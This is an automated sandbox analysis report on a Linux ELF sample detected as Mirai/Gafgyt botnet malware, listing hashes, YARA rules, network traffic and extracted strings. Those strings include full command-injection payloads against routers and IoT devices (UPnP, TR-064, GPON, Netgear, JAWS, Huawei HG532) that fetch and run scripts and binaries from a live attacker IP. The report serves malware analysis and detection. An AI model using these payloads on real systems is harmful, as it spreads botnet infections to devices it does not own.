Edit tour

Linux Analysis Report
yNGgbod6dt.elf

Overview

General Information

Sample Name:	yNGgbod6dt.elf
Analysis ID:	780227
MD5:	62f1db29777c386f59a4836a2578e635
SHA1:	0adc886845b8a3a549b6d41a16c7e1644ec15908
SHA256:	2b68e82dada6e7bfa17c1ef77c4f03920d5644e34686a6e8a6ea5b809de70c1a
Tags:	32elfgafgytMirai
Infos:
Errors No process behavior to analyse as no analysis process or sample was found

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Found strings indicative of a multi-platform dropper

Yara signature match

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	780227
Start date and time:	2023-01-08 16:30:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	yNGgbod6dt.elf
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.spre.troj.linELF@0/0@0/0

Errors

No process behavior to analyse as no analysis process or sample was found

Runtime Messages

Command:	/tmp/yNGgbod6dt.elf
PID:	6230
Exit Code:	255
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
yNGgbod6dt.elf	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x1b2f8:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB 0x1b3cc:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB 0x1b454:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB 0x1b4d0:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB
yNGgbod6dt.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
yNGgbod6dt.elf	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
yNGgbod6dt.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x18ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18f90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18fa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18fb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18fcc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18fe0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x18ff4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x19008:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1901c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x19030:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x19044:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x19058:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: yNGgbod6dt.elf	ReversingLabs: Detection: 41%
Source: yNGgbod6dt.elf	Virustotal: Detection: 49%			Perma Link

Spreading

Found strings indicative of a multi-platform dropper

Source: yNGgbod6dt.elf	String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
Source: yNGgbod6dt.elf	String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 190.173.195.220
Source: unknown	TCP traffic detected without corresponding DNS query: 190.173.195.220
Source: unknown	TCP traffic detected without corresponding DNS query: 190.107.216.65
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Source: yNGgbod6dt.elf	String found in binary or memory: http://89.208.107.26/diag00/log21.mips
Source: yNGgbod6dt.elf	String found in binary or memory: http://89.208.107.26/miniupd.sh
Source: yNGgbod6dt.elf	String found in binary or memory: http://89.208.107.26/miniupd.sh;
Source: yNGgbod6dt.elf	String found in binary or memory: http://89.208.107.26/miniupd.sh;chmod$
Source: yNGgbod6dt.elf	String found in binary or memory: http://89.208.107.26/miniupd.sh;sh
Source: yNGgbod6dt.elf	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: yNGgbod6dt.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: yNGgbod6dt.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Malicious sample detected (through community Yara rule)

Source: yNGgbod6dt.elf, type: SAMPLE

Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Source: yNGgbod6dt.elf, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: yNGgbod6dt.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/jaws;sh+jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.sh
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /
Source: Initial sample	Potential command found: GET /%s HTTP/1.0

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.shPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /HNAP1/ HTTP/1.0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>%d.%d.%d.%dGET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: bin/busybox
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f

Source: classification engine

Classification label: mal76.spre.troj.linELF@0/0@0/0

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: yNGgbod6dt.elf, type: SAMPLE

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: yNGgbod6dt.elf, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	Path Interception	1 Scripting	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yNGgbod6dt.elf	41%	ReversingLabs	Linux.Trojan.Gafgyt
yNGgbod6dt.elf	49%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://89.208.107.26/diag00/log21.mips	yNGgbod6dt.elf	false		unknown
http://89.208.107.26/miniupd.sh;chmod$	yNGgbod6dt.elf	false		unknown
http://89.208.107.26/miniupd.sh;sh	yNGgbod6dt.elf	false		unknown
http://89.208.107.26/miniupd.sh	yNGgbod6dt.elf	true		unknown
http://89.208.107.26/miniupd.sh;	yNGgbod6dt.elf	true		unknown
http://schemas.xmlsoap.org/soap/encoding/	yNGgbod6dt.elf	false		high
http://purenetworks.com/HNAP1/	yNGgbod6dt.elf	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	yNGgbod6dt.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.173.195.220	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
190.107.216.65	unknown	Argentina	52339	LimaVideoCableSACabletelAR	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
109.202.202.202	6beeLkLLDj.elf	Get hash	malicious	Browse
	UriVm8Snef.elf	Get hash	malicious	Browse
	8g1DY7z6g4.elf	Get hash	malicious	Browse
	0cssuxlCHI.elf	Get hash	malicious	Browse
	JPizdU1N6R.elf	Get hash	malicious	Browse
	hiEBvCSBps.elf	Get hash	malicious	Browse
	ZE2ZehwLOg.elf	Get hash	malicious	Browse
	MmFNpPhcFu.elf	Get hash	malicious	Browse
	Ffp4gnD2A8.elf	Get hash	malicious	Browse
	tNE3wBttWB.elf	Get hash	malicious	Browse
	0xzdoFh53o.elf	Get hash	malicious	Browse
	2IZIfvNeb2.elf	Get hash	malicious	Browse
	JgcR28z1x1.elf	Get hash	malicious	Browse
	8MNgRIy6bo.elf	Get hash	malicious	Browse
	XDNaGj68wF.elf	Get hash	malicious	Browse
	QXONhqaW7U.elf	Get hash	malicious	Browse
	g5udoka2nW.elf	Get hash	malicious	Browse
	ZCPnX13uLT.elf	Get hash	malicious	Browse
	L4pZpoOnJY.elf	Get hash	malicious	Browse
	NSlnqwYbZT.elf	Get hash	malicious	Browse
91.189.91.43	6beeLkLLDj.elf	Get hash	malicious	Browse
	UriVm8Snef.elf	Get hash	malicious	Browse
	8g1DY7z6g4.elf	Get hash	malicious	Browse
	0cssuxlCHI.elf	Get hash	malicious	Browse
	JPizdU1N6R.elf	Get hash	malicious	Browse
	hiEBvCSBps.elf	Get hash	malicious	Browse
	ZE2ZehwLOg.elf	Get hash	malicious	Browse
	MmFNpPhcFu.elf	Get hash	malicious	Browse
	Ffp4gnD2A8.elf	Get hash	malicious	Browse
	tNE3wBttWB.elf	Get hash	malicious	Browse
	0xzdoFh53o.elf	Get hash	malicious	Browse
	2IZIfvNeb2.elf	Get hash	malicious	Browse
	JgcR28z1x1.elf	Get hash	malicious	Browse
	8MNgRIy6bo.elf	Get hash	malicious	Browse
	XDNaGj68wF.elf	Get hash	malicious	Browse
	QXONhqaW7U.elf	Get hash	malicious	Browse
	g5udoka2nW.elf	Get hash	malicious	Browse
	ZCPnX13uLT.elf	Get hash	malicious	Browse
	L4pZpoOnJY.elf	Get hash	malicious	Browse
	NSlnqwYbZT.elf	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LimaVideoCableSACabletelAR	boat.mpsl-20220930-1610.elf	Get hash	malicious	Browse	190.151.151.89
INIT7CH	6beeLkLLDj.elf	Get hash	malicious	Browse	109.202.202.202
	UriVm8Snef.elf	Get hash	malicious	Browse	109.202.202.202
	8g1DY7z6g4.elf	Get hash	malicious	Browse	109.202.202.202
	0cssuxlCHI.elf	Get hash	malicious	Browse	109.202.202.202
	JPizdU1N6R.elf	Get hash	malicious	Browse	109.202.202.202
	hiEBvCSBps.elf	Get hash	malicious	Browse	109.202.202.202
	ZE2ZehwLOg.elf	Get hash	malicious	Browse	109.202.202.202
	MmFNpPhcFu.elf	Get hash	malicious	Browse	109.202.202.202
	Ffp4gnD2A8.elf	Get hash	malicious	Browse	109.202.202.202
	tNE3wBttWB.elf	Get hash	malicious	Browse	109.202.202.202
	0xzdoFh53o.elf	Get hash	malicious	Browse	109.202.202.202
	2IZIfvNeb2.elf	Get hash	malicious	Browse	109.202.202.202
	JgcR28z1x1.elf	Get hash	malicious	Browse	109.202.202.202
	8MNgRIy6bo.elf	Get hash	malicious	Browse	109.202.202.202
	XDNaGj68wF.elf	Get hash	malicious	Browse	109.202.202.202
	QXONhqaW7U.elf	Get hash	malicious	Browse	109.202.202.202
	g5udoka2nW.elf	Get hash	malicious	Browse	109.202.202.202
	ZCPnX13uLT.elf	Get hash	malicious	Browse	109.202.202.202
	L4pZpoOnJY.elf	Get hash	malicious	Browse	109.202.202.202
	NSlnqwYbZT.elf	Get hash	malicious	Browse	109.202.202.202
TelefonicadeArgentinaAR	XsP344f0F0.elf	Get hash	malicious	Browse	181.24.172.222
	AP7H3dk8Ul.elf	Get hash	malicious	Browse	190.174.129.43
	p2TN9whN5w.elf	Get hash	malicious	Browse	179.36.81.34
	qagSvPgKYd.elf	Get hash	malicious	Browse	179.45.56.183
	nsc6A7rADm.elf	Get hash	malicious	Browse	200.70.253.243
	nusCkyuUaT.elf	Get hash	malicious	Browse	179.39.153.12
	razQKKxIPj.elf	Get hash	malicious	Browse	181.21.8.113
	EVvKZpy4l6.elf	Get hash	malicious	Browse	179.44.77.130
	transmigrativeLampwick.iso	Get hash	malicious	Browse	181.25.198.186
	l.x86_64.elf	Get hash	malicious	Browse	186.60.188.212
	dark.x86	Get hash	malicious	Browse	179.44.30.148
	svrHelper	Get hash	malicious	Browse	181.20.165.118
